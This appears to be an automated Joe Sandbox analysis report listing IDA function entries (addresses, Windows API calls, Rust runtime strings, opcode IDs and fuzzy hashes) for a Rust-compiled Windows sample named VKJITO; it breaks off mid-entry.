                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4af982ac453bbedf6d4f96f0524be61fbbb53de5fcff856ddf31ea94f00c68a3
                                          • Instruction ID: 787c4b4d8a21bff5eaafd5ab07b47db115d77274a5e5444b14c2a873bb014bee
                                          • Opcode Fuzzy Hash: 4af982ac453bbedf6d4f96f0524be61fbbb53de5fcff856ddf31ea94f00c68a3
                                          • Instruction Fuzzy Hash: 5131B737B0D3C2A1FB6DDA10902377DBA906762780FC989BDC66E17680ED2D9449D331
                                          Function 00007FF73A5DAB64 Relevance: .0, Instructions: 2COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 139fcc1d29d5164657fec0e5ebe7fb8d097fce3a6ea25197e54d9d4acd5e8263
                                          • Instruction ID: f2a3d88f0f4c81d7450c41b0ed6b33b5293c56e27ad769c8c7985d9b6ad79b45
                                          • Opcode Fuzzy Hash: 139fcc1d29d5164657fec0e5ebe7fb8d097fce3a6ea25197e54d9d4acd5e8263
                                          • Instruction Fuzzy Hash: 3CA0022B94CD12F0FA09BB24E952071B331EB52302BC102B1D52D41070EF7CA541E320
                                          Function 00007FF73A5C8BE3 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 253COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • failed to spawn thread, xrefs: 00007FF73A5C90A4
                                          • cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF73A5C911C
                                          • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF73A5C90E4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: Handle$CurrentDuplicateProcess$CloseErrorLast
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs$failed to spawn thread
                                          • API String ID: 120317985-263981136
                                          • Opcode ID: f3595bf2b31cfea6e23347fd63f60a5d7f440528f5d008c8782841e6d9b50d3a
                                          • Instruction ID: da3db3519fba423969d045460375410df9ebd293828a79e9558a4d376b3e077d
                                          • Opcode Fuzzy Hash: f3595bf2b31cfea6e23347fd63f60a5d7f440528f5d008c8782841e6d9b50d3a
                                          • Instruction Fuzzy Hash: 2EC19E2AA09B81D8F711AF74D8423E977A0FB56348F9441B5EA8D03B99DF3DE484D360
                                          Function 00007FF73A5B10E0 Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B1124
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B114A
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B11C5
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B11DA
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B1210
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B1231
                                          • memmove.VCRUNTIME140(00000001,?,?,?,?,00000000,?,?,00007FF73A5A6713), ref: 00007FF73A5B1358
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memmove$memset
                                          • String ID: assertion failed: n <= bs
                                          • API String ID: 3790616698-2139787691
                                          • Opcode ID: 1b3127f00a3030e7e3460ab684fe8014dd420f783fe365a7cc107eb72fc79516
                                          • Instruction ID: 206b86fdaa22a101859d0803190a8dca376fd8acf4317314b647c66b899f1256
                                          • Opcode Fuzzy Hash: 1b3127f00a3030e7e3460ab684fe8014dd420f783fe365a7cc107eb72fc79516
                                          • Instruction Fuzzy Hash: 2B81E42AA09786E4FB20BB2198526E9B354BB46794FC04271EE5D4BBC5DF3CE642D310
                                          Function 00007FF73A5BD840 Relevance: 12.1, APIs: 8, Instructions: 140fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$FileSleep$ErrorLastReadWritememset
                                          • String ID:
                                          • API String ID: 3673338832-0
                                          • Opcode ID: 2229b28413a99fa0d821bd83a9e28f30ab5c7d6d307353ba698ae4c13c8db627
                                          • Instruction ID: 41376467d12e270865842574051b5e7ef40562ee4d5ed045f1f11b6a3c7d2ac2
                                          • Opcode Fuzzy Hash: 2229b28413a99fa0d821bd83a9e28f30ab5c7d6d307353ba698ae4c13c8db627
                                          • Instruction Fuzzy Hash: 54517327604AC6A4F731AF25EC017F96360FB45799F844276ED5C07798DF789285E310
                                          Function 00007FF73A5CAC20 Relevance: 10.8, APIs: 7, Instructions: 263COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FullNamePathmemcmpmemmove
                                          • String ID:
                                          • API String ID: 2319842497-0
                                          • Opcode ID: cf7ad302de7728fc650c73c33ae6d099592146cabde4fb3e650b8427a8ac7eea
                                          • Instruction ID: 96931e92bf4a6ccb650ebe2ec37fd4ab712c5ace4633545f8406c7ade4fad0cd
                                          • Opcode Fuzzy Hash: cf7ad302de7728fc650c73c33ae6d099592146cabde4fb3e650b8427a8ac7eea
                                          • Instruction Fuzzy Hash: 2EB1D26AA05BC2A5F735AF21D8063E9B765FB06B98F804071DF5C5B789CF38D2419320
                                          Function 00007FF73A5CB140 Relevance: 10.8, APIs: 7, Instructions: 259COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FullNamePathmemcmp
                                          • String ID:
                                          • API String ID: 2929619185-0
                                          • Opcode ID: 2a533ef179a7183f35ae18e143f62a954d9cc98c63aa3ade5495b0ccec5ecdf9
                                          • Instruction ID: 3e6d8731fd4b5381bb50fb9fa5cc981eb0b74407af2fd69d1ef00e6c105f6d72
                                          • Opcode Fuzzy Hash: 2a533ef179a7183f35ae18e143f62a954d9cc98c63aa3ade5495b0ccec5ecdf9
                                          • Instruction Fuzzy Hash: E2B1926AB04BC295FB31AF21D8463E9B359FB06B98F818175DE5C4B789DF38D2419320
                                          Function 00007FF73A5B5AE0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memmove
                                          • String ID: assertion failed: old_left_len + count <= CAPACITY
                                          • API String ID: 2162964266-323339215
                                          • Opcode ID: 452feccd1db8fa0d10035c291713d94de8059aca1dfa39c42d016ee7b47553d7
                                          • Instruction ID: 59d260cc1c1a9b33616cba0b943aa8a894d1d72deba1226a1c6ff77567f215e2
                                          • Opcode Fuzzy Hash: 452feccd1db8fa0d10035c291713d94de8059aca1dfa39c42d016ee7b47553d7
                                          • Instruction Fuzzy Hash: FBA1E467A18BC591EA459F18E4063FAA364FF55B88F859372DF4D03261DF39E296C300
                                          Function 00007FF73A5C9E80 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF73A5CA08E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 1956605914-1397643090
                                          • Opcode ID: 5a122f9f142afb16b5a4d8ebf21f475bc3e017c8cc945f0c63b5290871851e56
                                          • Instruction ID: afea1c160fe9432be2ebd26f14418b7b8f82455aec805c4197faaa3227a5e5da
                                          • Opcode Fuzzy Hash: 5a122f9f142afb16b5a4d8ebf21f475bc3e017c8cc945f0c63b5290871851e56
                                          • Instruction Fuzzy Hash: 0251E93AA08642A2F720AB25F8053B6F251FB96380F944175DADD437E8DF7CD585E720
                                          Function 00007FF73A5C00C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: WaitOnAddress$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                                          • API String ID: 667068680-1826242509
                                          • Opcode ID: 9cb1ce57ebf45a7dd8a54e90391759f1f960326fe86313774f816689af570da8
                                          • Instruction ID: 1e307f663c0e2823c764a533d6028c6911fbef9eb93756cbe5841701763b04c1
                                          • Opcode Fuzzy Hash: 9cb1ce57ebf45a7dd8a54e90391759f1f960326fe86313774f816689af570da8
                                          • Instruction Fuzzy Hash: 4DF05429B4F607A1FD05BB01BD47574B2A49F46B81BC844B4CC0C03364EE3CA555A230
                                          Function 00007FF73A59FEB0 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 222stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcmp
                                          • String ID: RUST_BACKTRACEfailed to write the buffered data$TryFromIntError:$called `Result::unwrap()` on an `Err` value
                                          • API String ID: 1799893992-2411252233
                                          • Opcode ID: 809e7a324e1954ebd168fc0d20ed88300d44aa91d385dd5efaae873b659a1ca5
                                          • Instruction ID: ee50b92438443cc6e90110e7f2eb613616573bf661ceb8d3fbe94f9ecf5f186a
                                          • Opcode Fuzzy Hash: 809e7a324e1954ebd168fc0d20ed88300d44aa91d385dd5efaae873b659a1ca5
                                          • Instruction Fuzzy Hash: DA81122BB14A42A5FB10AB61D4025BEB360FB567A8FC04675DE6E03BD4DF38E546D320
                                          Function 00007FF73A5B7B40 Relevance: 9.1, APIs: 6, Instructions: 79timesleepsynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateWaitableTimerExW.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF73A5AD8DE,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5B7B6A
                                          • SetWaitableTimer.KERNEL32 ref: 00007FF73A5B7BC0
                                          • WaitForSingleObject.KERNEL32 ref: 00007FF73A5B7BD2
                                          • CloseHandle.KERNEL32 ref: 00007FF73A5B7BDD
                                          • CloseHandle.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF73A5AD8DE,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5B7BED
                                          • Sleep.KERNEL32(?,?,31786F62646E6173,?,33786F62646E6173,32786F62646E6173,00007FF73A5AD8DE,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5B7C39
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2261246915-0
                                          • Opcode ID: df4b7c4e0f28b5898b2a4717a009eac63ad23da5c5733a5e467018da1cae4ee1
                                          • Instruction ID: 21abc6084a67cc11bf96b8e64f9a02970b8aee1ada1540be5c1ad2849ba9aa24
                                          • Opcode Fuzzy Hash: df4b7c4e0f28b5898b2a4717a009eac63ad23da5c5733a5e467018da1cae4ee1
                                          • Instruction Fuzzy Hash: CE21492AB0FB4692FE5CAB256827734A105AF87B61FC44378DD2F067E0EE2C64009710
                                          Function 00007FF73A5C9B40 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 212COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF73A5C9DC9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: Handle$CloseConsoleErrorLastMode
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 1170577072-1397643090
                                          • Opcode ID: eb62733882b7c0ab55a34bfb60a3079ab1270fec595ba0a6c5474c5b93849ba0
                                          • Instruction ID: e941d7ca3c3511617ebf303bb189bec098b2374193b6bec52e637445d645ce31
                                          • Opcode Fuzzy Hash: eb62733882b7c0ab55a34bfb60a3079ab1270fec595ba0a6c5474c5b93849ba0
                                          • Instruction Fuzzy Hash: D591F726A08B92E4FB10AF61E4457F8B7A0AB12798F848171DE9D13799DF3CD145D330
                                          Function 00007FF73A5BD040 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 203COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookupUnwindVirtualmemset
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 2744335978-1397643090
                                          • Opcode ID: 7c3477d1440f9c9d02e5db5797094c3e8b381a7f62c2a024411e651ed6f10cdf
                                          • Instruction ID: 33eab9dc8a5c4b22ad879beec99176a1353d3c54ad1628214dc92469bffd0a95
                                          • Opcode Fuzzy Hash: 7c3477d1440f9c9d02e5db5797094c3e8b381a7f62c2a024411e651ed6f10cdf
                                          • Instruction Fuzzy Hash: 20B12B67608FC19CE7719F24EC413EA77A0EB0634EF444169DA4C5BB99DF389289DB10
                                          Function 00007FF73A5BCC10 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 153COMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF73A5BCE9F), ref: 00007FF73A5BCC46
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF73A5BCE9F), ref: 00007FF73A5BCDC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorFrequencyLastPerformanceQuery
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
                                          • API String ID: 3362413890-3176237871
                                          • Opcode ID: b0c4265b50fde610299b718220bcee1048d1fa352833f161786620d388aecadf
                                          • Instruction ID: d291e2504b7c79f8f9e7c6c8c108e0a3d5883789e1ed714b8e88664be08656bc
                                          • Opcode Fuzzy Hash: b0c4265b50fde610299b718220bcee1048d1fa352833f161786620d388aecadf
                                          • Instruction Fuzzy Hash: 1151386EF08782A5FB18EB64D80A6F9A365AF5A390F808171D81F02A94DF3CA541D364
                                          Function 00007FF73A5BC8B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF73A5BCA62
                                          • lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs, xrefs: 00007FF73A5BC920
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ExclusiveLock$Release$Acquire
                                          • String ID: called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs$lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs
                                          • API String ID: 1021914862-480352821
                                          • Opcode ID: ac3503c6af596cc8bccbc3749bdf567994a8dcfa19e4d4bec1c1b5b33ab120c4
                                          • Instruction ID: 1006ab33ffc1942e406215adac2ee02f0c96b346b262b8160f0aedd577a04a94
                                          • Opcode Fuzzy Hash: ac3503c6af596cc8bccbc3749bdf567994a8dcfa19e4d4bec1c1b5b33ab120c4
                                          • Instruction Fuzzy Hash: 39515F2AE09B43E5FB10FB24E8463B8B360AB66715FC042B1D95D022E5DF3CB595E364
                                          Function 00007FF73A5CB720 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$NtReleaseKeyedEvent$ntdll
                                          • API String ID: 1646373207-2191064745
                                          • Opcode ID: ecddea4fa7d1f352d0c3e4c62c3031562dbacd438e9a8043134616b1bb2bd14f
                                          • Instruction ID: 16cc901b59ee6e87c5fcf0eb5964ad036114b379c6113b4d8ec79208306d1d4a
                                          • Opcode Fuzzy Hash: ecddea4fa7d1f352d0c3e4c62c3031562dbacd438e9a8043134616b1bb2bd14f
                                          • Instruction Fuzzy Hash: 6C11B42AF18B55A4F600EB21AC456E8B7A4BB1A790FC44275DD6C03BA4EF3C9185D320
                                          Function 00007FF73A5CB800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
